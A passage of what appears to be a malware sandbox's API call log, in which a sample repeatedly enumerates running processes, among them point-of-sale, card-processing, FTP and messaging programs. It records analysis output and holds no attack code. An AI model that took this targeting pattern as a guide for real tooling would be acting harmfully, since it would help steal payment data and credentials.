pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0259.257] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0259.258] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0259.260] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0259.270] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0259.272] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0259.273] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0259.275] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0259.277] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0259.279] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0259.280] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0259.282] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0259.283] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0259.285] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0259.286] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0259.288] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0259.289] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0259.291] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0259.292] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0259.294] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0259.295] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0259.296] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0259.298] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0259.299] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0259.301] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0259.302] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.304] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.305] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.339] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0259.341] CloseHandle (hObject=0x1018) returned 1 [0259.341] Sleep (dwMilliseconds=0x64) [0259.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0259.478] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.483] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.485] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.486] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.488] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.489] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.490] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.492] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.493] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.494] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.499] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.501] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.502] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.504] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.505] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.506] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.508] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.509] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.530] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.531] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.533] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0259.534] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0259.535] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.537] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.538] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0259.539] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0259.541] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0259.594] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0259.596] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.598] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0259.600] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.602] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.603] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.609] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0259.611] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0259.612] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0259.614] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0259.616] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0259.618] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0259.672] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0259.675] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0259.676] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0259.678] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0259.680] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0259.686] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0259.688] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0259.690] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0259.692] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0259.693] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0259.695] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0259.697] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0259.704] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0259.706] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0259.708] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0259.710] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0259.712] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: 